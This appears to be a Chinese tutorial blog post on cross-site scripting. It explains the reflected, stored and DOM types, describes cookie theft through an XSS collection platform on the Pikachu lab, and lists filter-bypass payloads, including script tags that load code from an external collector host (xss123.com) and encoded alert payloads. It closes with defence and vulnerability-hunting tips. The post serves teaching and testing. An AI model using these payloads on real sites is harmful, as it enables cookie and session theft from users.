XSS跨站脚本及其漏洞

最新推荐文章于 2024-07-26 17:39:18 发布
最新推荐文章于 2024-07-26 17:39:18 发布
阅读量943 收藏 19
点赞数 23
文章标签: xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wbplife/article/details/139332278
版权

XSS跨站脚本

xss漏洞原理:web应用程序对用户输入的内容和程序输出的内容没有进行严格 的过滤和检验,导致攻击者构造出的恶意代码被带入后,被当作正常的代码输出到前端页面,被浏览器当作有效代码解析执行从而产生危害。

漏洞危害

网站挂马、非法转账、强制发送电子邮件、控制受害者机器向其他网站发起攻击、盗取企业的商业价值、盗取各类账号密码

漏洞分类

反射型、存储型、DOM型

反射型XSS

漏洞介绍

定义:反射型XSS又称非持久性XSS、反射型XSS的恶意代码被写在web应用的参数中,需要受害者点击恶意代码链接,触发XSS攻击。

特点:攻击是一次性的

反射性XSS,属于交互触发的漏洞,需要用户主动点击才能触发,所以需要

攻击者主动将包含恶意代码的URL发送给用户。

漏洞发现点
网站的搜索栏:输入搜索框里的内容可以在页面上面显示出来,会存在XSS漏洞。
用户登录入口;输入登录信息点击登陆后,账号框里面账号不会消失,可能存在,这就要点开网页检查html代码,并在账号框里面要先进行标签闭合。
输入表单等地方;
​
存储型XSS

漏洞介绍:

定义:存储型XSS又称为持久型跨站脚本,因为XSS代码不在参数中,而是被写入数据库中或文件中。当用户浏览这个页面或内容时,触发代码加载执行。

特点:攻击代码脚本会永久存放在数据库或文件中,具有很高的隐蔽性。

# 攻击过程:

  1. 攻击者向Web界面插入恶意的XSS攻击代码

  1. Web服务器会将其结果保存到数据库中

  1. 用户正常访问Web页面

  1. Web页面将数据库的数据以及视图返回给前端,前端渲染并加载恶意的数据

  1. 客户端渲染视图,加载XSS代码并向攻击者的Web服务器发送敏感信息

  1. 攻击者读取用户的敏感信息

DOM型XSS

漏洞介绍:

定义:它的攻击代码并不需要服务器解析响应,触发XSS靠的是浏览器端的 DOM解析 ,当JS脚本从URL或页面中获得数据并将其传递到支持动态代码执行的接收器时,就会产生基于DOM的XSS漏洞。

漏洞成因: 基于DoM文档对象的一种漏洞,并且DOM型XSS是基于JS上的,并不需要与服务器进行交互。

# 具体攻击流程

  1. 攻击者将Payload放置咋URL链接中(针对GET型反射XSS)

  1. 用户点击恶意链接,并打开浏览器

  1. 此时浏览器客户端并不会发起HTTP请求到WEB服务器,而是在浏览器客户端执行XSS代码

  1. 此时将XSS代码执行结果发送给攻击者的恶意服务器

  1. 攻击者访问自己的XSS平台并读取用户的敏感信息

XSS-窃取Cookie

步骤一:在XSS以下网站注册账号并登陆,在我的项目点击"创建"并填写项目名称,下一步

步骤二:在项目配置中选择"超级默认模块"点击下一步,便可获取其攻击的XSS语句

步骤三:随便打开一个Pikachu平台并使用账号登录...到XSS模块中执行恶意攻击代码..

步骤四:此时回到平台上可看到其劫持的Cookie信息...

XSS绕过与挖掘

# 预定义字符

○ & (和号)成为 &
○ " (双引号)成为 "
○ ' (单引号)成为 '
○ < (小于)成为 &lt;
○ >(大于)成为 &gt;
但是有在 input 这些标签里是不用考虑标签实体化,因为用不上<>这两个标签:
<input type="text" name="username" value="" οnclick="javascript:alert('xss');"/>
# Payload
&lt;script&gt;alert(&quot;xss&quot;)&lt;/script&gt;
XSS绕过方法

过滤alert

<script>prompt(/xss/);</script>
​
<script>confirm(1);</script>
​
<script src=http://www.xss123.com/eciAKj?1623635663></script>

GPC过滤字符

如果 gpc 开启的时候,特殊字符会被加上斜杠即,'变成\' ,xss 攻击代码不要带用单引号或双引号。
绕过 gpc 在 php 高版本 gpc 默认是没有的,但是开发程序员会使用
addcslashes() 对特殊字符进行转义。
# 案例代码
这个是执行不了的
<script src='http://www.xss123.com/JGdbsl?1623638390'></script>
没有单引号可执行
<script src=//www.xss123.com/JGdbsl?1623638390></script>

Ascii编码

# fromCharCode() 可接受一个指定的 Unicode 值,然后返回一个字符串
<script>alert(String.fromCharCode(88,83,83))</script>

URL编码

<a href="javascript:%61%6c%65%72%74%28%32%29">123</a>

JS编码

# 16 进制编码
<script>eval("\x61\x6c\x65\x72\x74\x28\x31\x29")</script>

HTML编码

Base64编码

构造事件绕过

其他绕过方法

XSS漏洞防御

对输入(和 URL 参数)进行过滤,对输出进行 HTML实体化编码 ,也就是对提交的所有内容进行过滤,对 url 中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行 html 编码,使脚本无法在浏览器中执行;

漏洞挖掘

怎么挖XSS?

1.寻找用户输入的内容会被显示到页面中的功能点(搜索框、登录框等)

2.寻找用户插入到数据库中的数据,会被展示到页面上的功能点(注册框、留言板等)

wbplife
关注
xss跨站脚本攻击详解
06-08
XSS攻击,全称为**跨站脚本攻击**(Cross Site Scripting),是一种常见的网络安全漏洞,它发生在Web应用程序未能正确过滤用户输入的数据时。攻击者可以借此机会将恶意脚本注入到正常的应用程序流程中,进而对其他...
跨站脚本漏洞XSS
qq_48904485的博客
03-22 8606
一、XSS跨站脚本基础 1、XSS漏洞介绍 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 2、XSS漏洞原理 形成XSS漏洞的主要原因是程序对输入和输出的控制不够严格,导致“精心构造”的脚本输入后,在输到前端时被浏览器当作有效代码解析执
XSS跨站脚本漏洞简介、原理及防护方法
m0_54899775的博客
03-21 7917
XSS跨站脚本漏洞简介、原理及防护方法 XSS跨站漏洞原理及防护
XSS漏洞详解
最新发布
apple_74953689的博客
07-26 581
XSS类型存储型反射型DOM型触发过程黑客构造XSS脚本后正常用户访问携带XSS脚本的页面正常用户访问携带XSS脚本的URL正常用户访问携带XSS脚本的URL数据存储数据库URLURL谁来输出后端web应用程序后端web应用程序前端Javascript输出位置HTTP响应中HTTP响应中动态构造的DOM节点是否持久是否否W3C提出的CSP是一个HTTP头部,允许网站所有者定义哪些内容可以被加载到页面中。
浅谈“XSS跨站脚本攻击漏洞
→_→
05-20 1260
漏洞名称: 存储型XSS跨站脚本,反射型XSS跨站脚本, 描述: 跨站脚本攻击的英文全称是Cross Site Script,为了和样式表区分,缩写为XSS。发生的原因是网站将用户输入的内容输出到页面上,在这个过程中可能有恶意代码被浏览器执行。跨站脚本攻击,它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。XSS属于被动式的攻击,因为其被动且不好利用,所以许多人常呼略其危害性。而本文主要讲的是利用X
跨站脚本攻击漏洞XSS):基础知识和防御策略
weixin_43263566的博客
01-16 1万+
跨站脚本攻击漏洞-基础篇
XSS-跨站脚本攻击 漏洞详解
m0_69043895的博客
04-20 2279
XSS全称跨站脚本(Cross Site Scripting),为避免与层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故缩写为XSS。这是一种将任意 Javascript 代码插入到其他Web用户页面里执行以达到攻击目的的漏洞。攻击者利用浏览器的动态展示数据功能,在HTML页面里嵌入恶意代码。当用户浏览改页时,这些潜入在HTML中的恶意代码会被执行,用户浏览器被攻击者控制,从而达到攻击者的特殊目的,如 cookie窃取等。
xss跨站脚本攻击
05-26
### XSS跨站脚本攻击详解 #### 一、XSS跨站脚本攻击概述 XSS(Cross-Site Scripting),即跨站脚本攻击,是一种常见的网络安全威胁,主要通过在受害者的浏览器环境中注入恶意脚本,从而实现对用户的攻击。这种攻击...
XSS跨站脚本攻击
04-25
### XSS跨站脚本攻击详解 #### 一、XSS跨站脚本攻击概述 XSS(Cross-Site Scripting)跨站脚本攻击是一种常见的Web应用安全威胁,其核心在于利用网站对用户输入数据的处理不当,允许攻击者注入恶意脚本到网页中,...
XSS跨站脚本攻击方法初探
06-03
本文主要探讨了XSS(Cross Site Scripting,跨站脚本)攻击的基本概念、原理及其常见的几种攻击手法。XSS攻击是一种针对Web应用程序的安全漏洞,攻击者通过在合法网站上插入恶意脚本来获取用户的敏感信息。本文将...
Xss跨站脚本攻击基础
04-11
XSS(Cross Site Scripting)攻击,即跨站脚本攻击,是一种常见的Web应用程序安全漏洞。这种攻击方式利用网页开发时的疏忽,允许攻击者将恶意脚本注入到网页中,当用户浏览该网页时,恶意脚本就会被执行,进而获取...
WEB漏洞-XSS跨站脚本漏洞解决方案
踮脚敲代码
01-11 4641
一、测试过程 通过手工测试,构造用户可控参数访问,发现网站部分页面对用户可控参数未做过滤限制,存在XSS跨站脚本漏洞,测试如下: POST /task/notepad/insertNotepad HTTP/1.1 Host: www.xxx.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,e
【WEB漏洞原理】XSS 跨站脚本攻击
过期的秋刀鱼
08-26 3115
当用户访问被XSS 脚本注入过的网页,XSS 脚本就会被提取出来,用户浏览器就会解析执行这段代码,也就是说用户被攻击了。DOM 型XSS 是一种XSS 攻击,其中攻击的代码是由于修改受害者浏览器页面的DOM 树而执行的。搜索框、登录框、微博、留言板、聊天室等等收集用户输入的地方,都有可能被注入XSS 代码,都存在遭受XSS 的风险。XSS 攻击目标是客户端浏览器用户,由于浏览器的类别不同,攻击效果不同,甚至于同一款浏览器,攻击效果都不一样。浏览器的类型,版本等因素都会影响XSS 的效果。
跨站脚本XSS漏洞
梁辰兴的博客
06-07 4959
Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型: 1.反射性XSS; 2.存储型XSS; 3.DOM型XSS;XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。XSS漏洞可以用来进行钓鱼攻击、前端js挖矿、用户cookie获取。甚至可以结合浏览器自身漏洞对用户主机进行远程控制等。形
跨站脚本XSS漏洞_跨站脚本漏洞
jennycisp的博客
05-13 1244
Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型:1.反射性XSS;2.存储型XSS;3.DOM型XSS;XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。XSS漏洞可以用来进行钓鱼攻击、前端js挖矿、用户cookie获取。
关于 XSS跨站脚本漏洞
辉小鱼的博客
09-05 1486
XSS攻击全称跨站脚本攻击,是一种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。
XSS(跨站脚本攻击)漏洞解析(带靶场演示)
wudideaqing的博客
06-24 2109
XSS跨站脚本攻击,全称Cross-Site Scripting)是一种常见网络安全漏洞,允许攻击者在用户浏览器中执行恶意脚本。攻击者通过在受信任网站中注入恶意代码,诱骗用户点击或加载恶意内容,从而窃取数据、篡改页面或劫持用户。
DOM型的xss漏洞利用
热门推荐
qq_43814486的博客
04-22 1万+
DOM:通过JavaScript,可以重构整个HTML文档,就是说可以添加,移除等等,对页面的某个东西进行操作时,JavaScript就需要获得对HTML文档中所有元素进行访问的入口。这个入口就是DOM,所以在DOM型的xss漏洞利用中,DOM可以看成是一个访问HTML的标准程序接口。 特征:整个过程都是在前端完成的,没有后端的参与(纯前端的操作!) 原理: 上图var str = docume...
XSS跨站脚本漏洞
ve9etable的博客
11-01 397
XSS是什么 中文名:跨站脚本攻击 英文全称:Cross Site Scripting 为了不与层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。 恶意攻击者往web页面里插入恶意js代码,用户在浏览时,嵌在页面中的代码会被执行,达到攻击用户的目的 XSS攻击位置 用户输入作为script标签内容,作为HTML注释内容,作为HTML标签的属性名,作为HTML标签的属性值,作为HTML标签的名字,直接插入到CSS里 XSS攻击载荷
XSS攻击:跨站脚本漏洞实例解析
XSS_跨站代码大全” XSS(Cross-site scripting)是一种常见的网络安全漏洞,它允许攻击者在用户浏览器上注入恶意脚本。这些脚本可以劫持用户会话、盗取敏感信息或者执行其他恶意操作。下面将详细解释几种常见的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值